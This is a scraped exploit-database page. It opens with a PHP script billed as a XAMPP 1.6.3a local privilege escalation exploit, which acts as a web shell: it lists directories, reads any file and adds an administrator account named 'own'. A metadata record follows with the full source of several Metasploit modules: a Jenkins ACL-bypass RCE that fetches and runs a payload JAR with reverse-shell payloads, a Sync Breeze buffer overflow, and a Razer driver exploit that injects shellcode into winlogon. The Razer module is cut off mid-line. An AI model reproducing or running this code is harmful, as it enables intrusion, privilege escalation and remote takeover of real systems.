XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
2007-08-27T00:00:00
ID 1337DAY-ID-7722 Type zdt Reporter Inphex Modified 2007-08-27T00:00:00
Description
Exploit for unknown platform in category local exploits
===========================================================
XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
===========================================================
<?php
//Inphex
//htdocs must be accessable and writable,apache must have been ran by root.
//to add a user open like this : script.php?qQx
// Directory of C:\Documents and Settings\Admin
//27.08.2007 16:36 <DIR> .
//27.08.2007 16:36 <DIR> ..
//14.08.2007 14:21 108 .asadminpass
//14.08.2007 14:21 772 .asadmintruststore
//14.08.2007 18:31 <DIR> .exe4j4
//26.08.2007 03:13 427 .glade2
//21.08.2007 16:35 <DIR> .msf3
//10.08.2007 04:41 <DIR> Contacts
//27.08.2007 01:44 129 default.pls
//27.08.2007 17:57 <DIR> Desktop
//23.08.2007 21:12 <DIR>
$qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];
$qQd = opendir($qQa);
if (isset($_GET['qrF']))
{
$qrX = fopen($_GET['qrF'],"r");
echo fread($qrX,50000);
exit;
} elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administratoren own /add"); echo "User own -> full privileges successfully addet";exit;}
echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>";
echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));
echo "</textarea>";
while (false !== ($qQr = readdir($qQd))){
switch(filetype($qQa.$qQr))
{
case "dir":
echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";
break;
case "file":
echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";
break;
}
}
?>
# 0day.today [2018-02-02] #
{"hash": "8711a57af986101b05a16503a91cad72808a1e7f1c68728822f0c01fbb692b22", "id": "1337DAY-ID-7722", "lastseen": "2018-02-02T03:08:53", "viewCount": 27, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8ea3cb8f764b9de8d6033617a44e5c24", "key": "href"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "modified"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "09e7a250020aed5a4bf5fca409a426c3", "key": "reporter"}, {"hash": "131ec84f77ffc5902fdfa7d92978c248", "key": "sourceData"}, {"hash": "f9e93a882890b1ec5dfb9d762f26250a", "key": "sourceHref"}, {"hash": "6bc57263910d725e82b00c21c97de392", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2018-02-02T03:08:53"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310122095", "OPENVAS:1361412562310120518", "OPENVAS:136141256231071958", "OPENVAS:136141256231071941"]}, {"type": "hackerone", "idList": ["H1:88904"]}, {"type": "jvn", "idList": ["JVN:23809730"]}, {"type": "nessus", "idList": ["ALA_ALAS-2011-1.NASL", "F5_BIGIP_SOL13114.NASL", "SUSE_11_3_APACHE2-110831.NASL", "SUSE_11_4_APACHE2-110831.NASL", "ALA_ALAS-2011-01.NASL", "ORACLELINUX_ELSA-2011-1245.NASL", "REDHAT-RHSA-2011-1294.NASL"]}, {"type": "amazon", "idList": ["ALAS-2011-001"]}, {"type": "seebug", "idList": ["SSV:72403"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126851", "PACKETSTORM:123527", "PACKETSTORM:122962"]}, {"type": "f5", "idList": ["F5:K13114"]}, {"type": "zdt", "idList": ["1337DAY-ID-21170"]}], "modified": "2018-02-02T03:08:53"}, "vulnersScore": -0.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7722", "description": "Exploit for unknown platform in category local exploits", "title": "XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit", "history": [{"bulletin": {"hash": "5b7fbed85f2408c843b1a970b4982e762a0bc11cfa45c30d5f1832100819f8e8", "id": "1337DAY-ID-7722", "lastseen": "2016-04-20T00:12:39", "enchantments": {"score": {"value": 3.6, "modified": "2016-04-20T00:12:39"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ca8b1d3988fada4b330a535abb225c6b", "key": "href"}, {"hash": "bcf0e7b22cfd54a56328b36414671037", "key": "sourceHref"}, {"hash": "09e7a250020aed5a4bf5fca409a426c3", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "modified"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "published"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6986ff1f2850fdcf1c5afd988672ac65", "key": "sourceData"}, {"hash": "6bc57263910d725e82b00c21c97de392", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/7722", "description": "Exploit for unknown platform in category local exploits", "viewCount": 6, "title": "XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===========================================================\r\nXAMPP for Windows 1.6.3a Local Privilege Escalation Exploit\r\n===========================================================\r\n\r\n\r\n\r\n<?php\r\n//Inphex\r\n//htdocs must be accessable and writable,apache must have been ran by root.\r\n//to add a user open like this : script.php?qQx\r\n\r\n// Directory of C:\\Documents and Settings\\Admin\r\n\r\n//27.08.2007 16:36 <DIR> .\r\n//27.08.2007 16:36 <DIR> ..\r\n//14.08.2007 14:21 108 .asadminpass\r\n//14.08.2007 14:21 772 .asadmintruststore\r\n//14.08.2007 18:31 <DIR> .exe4j4\r\n//26.08.2007 03:13 427 .glade2\r\n//21.08.2007 16:35 <DIR> .msf3\r\n//10.08.2007 04:41 <DIR> Contacts\r\n//27.08.2007 01:44 129 default.pls\r\n//27.08.2007 17:57 <DIR> Desktop\r\n//23.08.2007 21:12 <DIR> \r\n$qQa = ($_GET['qmB'] == \"\")?\"./\":$_GET['qmB'];\r\n$qQd = opendir($qQa);\r\n\r\nif (isset($_GET['qrF']))\r\n{\r\n $qrX = fopen($_GET['qrF'],\"r\");\r\n echo fread($qrX,50000);\r\n exit;\r\n} elseif(isset($_GET['qQx'])) { exec(\"net user own own /add & net localgroup Administratoren own /add\"); echo \"User own -> full privileges successfully addet\";exit;}\r\necho \"<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>\";\r\necho htmlspecialchars(shell_exec(\"cd \".$qQa.\" & dir\"));\r\necho \"</textarea>\";\r\nwhile (false !== ($qQr = readdir($qQd))){\r\n\r\nswitch(filetype($qQa.$qQr))\r\n {\r\n case \"dir\":\r\n echo \"<a href=?qmB=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\"/>\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n case \"file\":\r\n echo \"<a href=?qrF=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\">\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n }\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2007-08-27T00:00:00", "references": [], "reporter": "Inphex", "modified": "2007-08-27T00:00:00", "href": "http://0day.today/exploit/description/7722"}, "lastseen": "2016-04-20T00:12:39", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===========================================================\r\nXAMPP for Windows 1.6.3a Local Privilege Escalation Exploit\r\n===========================================================\r\n\r\n\r\n\r\n<?php\r\n//Inphex\r\n//htdocs must be accessable and writable,apache must have been ran by root.\r\n//to add a user open like this : script.php?qQx\r\n\r\n// Directory of C:\\Documents and Settings\\Admin\r\n\r\n//27.08.2007 16:36 <DIR> .\r\n//27.08.2007 16:36 <DIR> ..\r\n//14.08.2007 14:21 108 .asadminpass\r\n//14.08.2007 14:21 772 .asadmintruststore\r\n//14.08.2007 18:31 <DIR> .exe4j4\r\n//26.08.2007 03:13 427 .glade2\r\n//21.08.2007 16:35 <DIR> .msf3\r\n//10.08.2007 04:41 <DIR> Contacts\r\n//27.08.2007 01:44 129 default.pls\r\n//27.08.2007 17:57 <DIR> Desktop\r\n//23.08.2007 21:12 <DIR> \r\n$qQa = ($_GET['qmB'] == \"\")?\"./\":$_GET['qmB'];\r\n$qQd = opendir($qQa);\r\n\r\nif (isset($_GET['qrF']))\r\n{\r\n $qrX = fopen($_GET['qrF'],\"r\");\r\n echo fread($qrX,50000);\r\n exit;\r\n} elseif(isset($_GET['qQx'])) { exec(\"net user own own /add & net localgroup Administratoren own /add\"); echo \"User own -> full privileges successfully addet\";exit;}\r\necho \"<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>\";\r\necho htmlspecialchars(shell_exec(\"cd \".$qQa.\" & dir\"));\r\necho \"</textarea>\";\r\nwhile (false !== ($qQr = readdir($qQd))){\r\n\r\nswitch(filetype($qQa.$qQr))\r\n {\r\n case \"dir\":\r\n echo \"<a href=?qmB=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\"/>\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n case \"file\":\r\n echo \"<a href=?qrF=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\">\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n }\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-02-02] #", "published": "2007-08-27T00:00:00", "references": [], "reporter": "Inphex", "modified": "2007-08-27T00:00:00", "href": "https://0day.today/exploit/description/7722"}
{"metasploit": [{"lastseen": "2019-11-20T16:26:17", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file. When the \"Java Dropper\" target is selected, the original entry point based on classLoader.parseClass is used, which requires the use of Groovy metaprogramming to achieve RCE. When the \"Unix In-Memory\" target is selected, a newer, higher-level, and more universal entry point based on GroovyShell.parse is used. This permits the use of in-memory arbitrary command execution. The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work on later versions of Jenkins. Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.\n", "modified": "2019-05-30T05:06:10", "published": "2019-02-23T07:34:27", "id": "MSF:EXPLOIT/MULTI/HTTP/JENKINS_METAPROGRAMMING", "href": "", "type": "metasploit", "title": "Jenkins ACL Bypass and Metaprogramming RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins ACL Bypass and Metaprogramming RCE',\n 'Description' => %q{\n This module exploits a vulnerability in Jenkins dynamic routing to\n bypass the Overall/Read ACL and leverage Groovy metaprogramming to\n download and execute a malicious JAR file.\n\n When the \"Java Dropper\" target is selected, the original entry point\n based on classLoader.parseClass is used, which requires the use of\n Groovy metaprogramming to achieve RCE.\n\n When the \"Unix In-Memory\" target is selected, a newer, higher-level,\n and more universal entry point based on GroovyShell.parse is used.\n This permits the use of in-memory arbitrary command execution.\n\n The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work\n on later versions of Jenkins.\n\n Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.\n },\n 'Author' => [\n 'Orange Tsai', # (@orange_8361) Discovery and PoC\n 'Mikhail Egorov', # (@0ang3el) Discovery and PoC\n 'George Noseevich', # (@webpentest) Discovery and PoC\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-1000861'], # Orange Tsai\n ['CVE', '2019-1003000'], # Script Security\n ['CVE', '2019-1003001'], # Pipeline: Groovy\n ['CVE', '2019-1003002'], # Pipeline: Declarative\n ['CVE', '2019-1003005'], # Mikhail Egorov\n ['CVE', '2019-1003029'], # George Noseevich\n ['EDB', '46427'],\n ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],\n ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],\n ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],\n ['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc'],\n ['URL', 'https://twitter.com/orange_8361/status/1126829648552312832'],\n ['URL', 'https://github.com/orangetw/awesome-jenkins-rce-2019']\n ],\n 'DisclosureDate' => '2019-01-08', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'java'],\n 'Arch' => [ARCH_CMD, ARCH_JAVA],\n 'Privileged' => false,\n 'Targets' => [\n ['Unix In-Memory',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Gem::Version.new('2.137'),\n 'Type' => :unix_memory,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}\n ],\n ['Java Dropper',\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Version' => Gem::Version.new('2.137'),\n 'Type' => :java_dropper,\n 'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'}\n ]\n ],\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n },\n 'Stance' => Stance::Aggressive\n ))\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n\n deregister_options('URIPATH')\n end\n\n=begin\n http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]\n=end\n def check\n checkcode = CheckCode::Safe\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => go_go_gadget1('/search/index'),\n 'vars_get' => {'q' => 'a'}\n )\n\n unless res && (version = res.headers['X-Jenkins'])\n vprint_error('Jenkins version not detected')\n return CheckCode::Unknown\n end\n\n vprint_status(\"Jenkins #{version} detected\")\n checkcode = CheckCode::Detected\n\n if Gem::Version.new(version) > target['Version']\n vprint_error(\"Jenkins #{version} is not a supported target\")\n return CheckCode::Safe\n end\n\n vprint_good(\"Jenkins #{version} is a supported target\")\n checkcode = CheckCode::Appears\n\n if res.body.include?('Administrator')\n vprint_good('ACL bypass successful')\n checkcode = CheckCode::Vulnerable\n else\n vprint_error('ACL bypass unsuccessful')\n return CheckCode::Safe\n end\n\n checkcode\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n print_status(\"Configuring #{target.name} target\")\n\n vars_get = {'value' => go_go_gadget2}\n\n case target['Type']\n when :unix_memory\n vars_get = {'sandbox' => true}.merge(vars_get)\n when :java_dropper\n # NOTE: Ivy is using HTTP unconditionally, so we can't use HTTPS\n # HACK: Both HttpClient and HttpServer use datastore['SSL']\n ssl = datastore['SSL']\n datastore['SSL'] = false\n start_service('Path' => '/')\n datastore['SSL'] = ssl\n end\n\n print_status('Sending Jenkins and Groovy go-go-gadgets')\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => go_go_gadget1,\n 'vars_get' => vars_get\n )\n end\n\n #\n # Exploit methods\n #\n\n=begin\n http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword\n ?apiUrl=http://169.254.169.254/%23\n &login=orange\n &password=tsai\n=end\n def go_go_gadget1(custom_uri = nil)\n # NOTE: See CVE-2018-1000408 for why we don't want to randomize the username\n acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')\n\n return normalize_uri(acl_bypass, custom_uri) if custom_uri\n\n rce_base = normalize_uri(acl_bypass, 'descriptorByName')\n\n rce_uri =\n case target['Type']\n when :unix_memory\n '/org.jenkinsci.plugins.' \\\n 'scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'\n when :java_dropper\n '/org.jenkinsci.plugins.' \\\n 'workflow.cps.CpsFlowDefinition/checkScriptCompile'\n end\n\n normalize_uri(rce_base, rce_uri)\n end\n\n=begin\n http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile\n ?value=\n @GrabConfig(disableChecksums=true)%0a\n @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a\n @Grab(group='tw.orange', module='poc', version='1')%0a\n import Orange;\n=end\n def go_go_gadget2\n case target['Type']\n when :unix_memory\n payload_escaped = payload.encoded.gsub(\"'\", \"\\\\'\")\n\n (\n <<~EOF\n class #{app} {\n #{app}() {\n ['sh', '-c', '#{payload_escaped}'].execute()\n }\n }\n EOF\n ).strip\n when :java_dropper\n (\n <<~EOF\n @GrabConfig(disableChecksums=true)\n @GrabResolver('http://#{srvhost_addr}:#{srvport}')\n @Grab('#{vendor}:#{app}:#{version}')\n import #{app}\n EOF\n ).strip\n end\n end\n\n #\n # Payload methods\n #\n\n #\n # If you deviate from the following sequence, you will suffer!\n #\n # HEAD /path/to/pom.xml -> 404\n # HEAD /path/to/payload.jar -> 200\n # GET /path/to/payload.jar -> 200\n #\n def on_request_uri(cli, request)\n vprint_status(\"#{request.method} #{request.uri} requested\")\n\n unless %w[HEAD GET].include?(request.method)\n vprint_error(\"Ignoring #{request.method} request\")\n return\n end\n\n if request.method == 'HEAD'\n if request.uri != payload_uri\n vprint_error('Sending 404')\n return send_not_found(cli)\n end\n\n vprint_good('Sending 200')\n return send_response(cli, '')\n end\n\n if request.uri != payload_uri\n vprint_error('Sending bogus file')\n return send_response(cli, \"#{Faker::Hacker.say_something_smart}\\n\")\n end\n\n vprint_good('Sending payload JAR')\n send_response(\n cli,\n payload_jar,\n 'Content-Type' => 'application/java-archive'\n )\n\n # XXX: $HOME may not work in some cases\n register_dir_for_cleanup(\"$HOME/.groovy/grapes/#{vendor}\")\n end\n\n def payload_jar\n jar = payload.encoded_jar\n\n jar.add_file(\"#{app}.class\", exploit_class)\n jar.add_file(\n 'META-INF/services/org.codehaus.groovy.plugins.Runners',\n \"#{app}\\n\"\n )\n\n jar.pack\n end\n\n=begin javac Exploit.java\n import metasploit.Payload;\n\n public class Exploit {\n public Exploit(){\n try {\n Payload.main(null);\n } catch (Exception e) { }\n\n }\n }\n=end\n def exploit_class\n klass = Rex::Text.decode_base64(\n <<~EOF\n yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB\n AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq\n YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl\n Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n\n L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q\n twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL\n AAAA\n EOF\n )\n\n # Replace length-prefixed string \"Exploit\" with a random one\n klass.sub(/.Exploit/, \"#{[app.length].pack('C')}#{app}\")\n end\n\n #\n # Utility methods\n #\n\n def payload_uri\n \"/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar\"\n end\n\n def vendor\n @vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join\n end\n\n def app\n @app ||= Faker::App.name.split(/[^[:alpha:]]/).join\n end\n\n def version\n @version ||= Faker::App.semantic_version\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jenkins_metaprogramming.rb"}, {"lastseen": "2019-11-07T11:25:55", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file.\n", "modified": "2018-01-23T22:34:49", "published": "2018-01-15T20:46:40", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/SYNCBREEZE_XML", "href": "", "type": "metasploit", "title": "Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',\n 'Description' => %q(\n This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16\n by using the import command option to import a specially crafted xml file.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniel Teixeira'\n ],\n 'References' =>\n [\n [ 'CVE', '2017-7310' ],\n [ 'EDB', '41773' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n 'DisablePayloadHandler' => 'true'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x01\\x02\\x0a\\x0b\\x0c\\x22\\x27\",\n 'StackAdjustment' => -3500\n },\n 'Targets' =>\n [\n ['Windows Universal', { 'Ret' => 0x10015FFE } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 29 2017',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])\n ])\n end\n\n def exploit\n jmpesp = \"\\x7A\\xB7\\x1B\\x65\" # JMP ESP QtGui4.dll\n esp = \"\\x8D\\x44\\x24\\x4C\" # LEA EAX, [ESP+76]\n jmp = \"\\xFF\\xE0\" # JMP ESP\n\n buffer = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\n<classify\\nname=\\'\"\n buffer << \"\\x90\" * 1536\n buffer << jmpesp\n buffer << \"\\x90\" * 18\n buffer << esp\n buffer << jmp\n buffer << \"\\x90\" * 68\n buffer << generate_seh_record(target.ret)\n buffer << \"\\x90\" * 10\n buffer << payload.encoded\n buffer << \"\\x90\" * 5000\n buffer << \"\\n</classify>\"\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(buffer)\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/syncbreeze_xml.rb"}, {"lastseen": "2019-12-03T02:38:03", "bulletinFamily": "exploit", "description": "A vulnerability exists in the latest version of Razer Synapse (v2.20.15.1104 as of the day of disclosure) which can be leveraged locally by a malicious application to elevate its privileges to those of NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver that passes a PID specified by the user to ZwOpenProcess. This can be issued by an application to open a handle to an arbitrary process with the necessary privileges to allocate, read and write memory in the specified process. This exploit leverages this vulnerability to open a handle to the winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by installing a hook to execute attacker controlled shellcode. This hook is then triggered on demand by calling user32!LockWorkStation(), resulting in the attacker's payload being executed with the privileges of the infected winlogon process. In order for the issued IOCTL to work, the RazerIngameEngine.exe process must not be running. This exploit will check if it is, and attempt to kill it as necessary. The vulnerable software can be found here: https://www.razerzone.com/synapse/. No Razer hardware needs to be connected in order to leverage this vulnerability. This exploit is not opsec-safe due to the user being logged out as part of the exploitation process.\n", "modified": "2018-10-28T00:54:14", "published": "2017-07-10T20:57:23", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/RAZER_ZWOPENPROCESS", "href": "", "type": "metasploit", "title": "Razer Synapse rzpnk.sys ZwOpenProcess", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/local/windows_kernel'\nrequire 'rex'\nrequire 'metasm'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Local::WindowsKernel\n include Msf::Post::Windows::Priv\n\n # the max size our hook can be, used before it's generated for the allocation\n HOOK_STUB_MAX_LENGTH = 256\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess',\n 'Description' => %q{\n A vulnerability exists in the latest version of Razer Synapse\n (v2.20.15.1104 as of the day of disclosure) which can be leveraged\n locally by a malicious application to elevate its privileges to those of\n NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler\n in the rzpnk.sys driver that passes a PID specified by the user to\n ZwOpenProcess. This can be issued by an application to open a handle to\n an arbitrary process with the necessary privileges to allocate, read and\n write memory in the specified process.\n\n This exploit leverages this vulnerability to open a handle to the\n winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by\n installing a hook to execute attacker controlled shellcode. This hook is\n then triggered on demand by calling user32!LockWorkStation(), resulting\n in the attacker's payload being executed with the privileges of the\n infected winlogon process. In order for the issued IOCTL to work, the\n RazerIngameEngine.exe process must not be running. This exploit will\n check if it is, and attempt to kill it as necessary.\n\n The vulnerable software can be found here:\n https://www.razerzone.com/synapse/. No Razer hardware needs to be\n connected in order to leverage this vulnerability.\n\n This exploit is not opsec-safe due to the user being logged out as part\n of the exploitation process.\n },\n 'Author' => 'Spencer McIntyre',\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2017-9769'],\n ['URL', 'https://warroom.securestate.com/cve-2017-9769/']\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested on (64 bits):\n # * Windows 7 SP1\n # * Windows 10.0.10586\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 20\n },\n 'DefaultTarget' => 0,\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 22 2017',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SERVICE_RESTARTS ],\n 'SideEffects' => [ SCREEN_EFFECTS ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n },\n ))\n end\n\n def check\n # Validate that the driver has been loaded and that\n # the version is the same as the one expected\n client.sys.config.getdrivers.each do |d|\n if d[:basename].downcase == 'rzpnk.sys'\n expected_checksum = 'b4598c05d5440250633e25933fff42b0'\n target_checksum = client.fs.file.md5(d[:filename])\n\n if expected_checksum == Rex::Text.to_hex(target_checksum, '')\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n end\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\n end\n\n if session.platform != 'windows'\n fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')\n elsif session.arch != ARCH_X64\n fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')\n end\n\n pid = session.sys.process['RazerIngameEngine.exe']\n if pid\n # if this process is running, the IOCTL won't work but the process runs\n # with user privileges so we can kill it\n print_status(\"Found RazerIngameEngine.exe pid: #{pid}, killing it...\")\n session.sys.process.kill(pid)\n end\n\n pid = session.sys.process['winlogon.exe']\n print_status(\"Found winlogon pid: #{pid}\")\n\n handle = get_handle(pid)\n fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?\n vprint_status('Successfully opened a handle to the winlogon process')\n\n winlogon = session.sys.process.new(pid, handle)\n allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH\n shellcode_address = winlogon.memory.allocate(allocation_size)\n winlogon.memory.protect(shellcode_address)\n print_good(\"Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}\")\n winlogon.memory.write(shellcode_address, payload.encoded)\n hook_stub_address = shellcode_address + payload.encoded.length\n\n result = session.railgun.kernel32.LoadLibraryA('user32')\n fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0\n user32_handle = result['return']\n\n # resolve and backup the functions that we'll install trampolines in\n user32_trampolines = {} # address => original chunk\n user32_functions = ['LockWindowStation']\n user32_functions.each do |function|\n address = get_address(user32_handle, function)\n winlogon.memory.protect(address)\n user32_trampolines[function] = {\n address: address,\n original: winlogon.memory.read(address, 24)\n }\n end\n\n # generate and install the hook asm\n hook_stub = get_hook(shellcode_address, user32_trampolines)\n fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?\n # if this happens, there was a programming error\n fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > 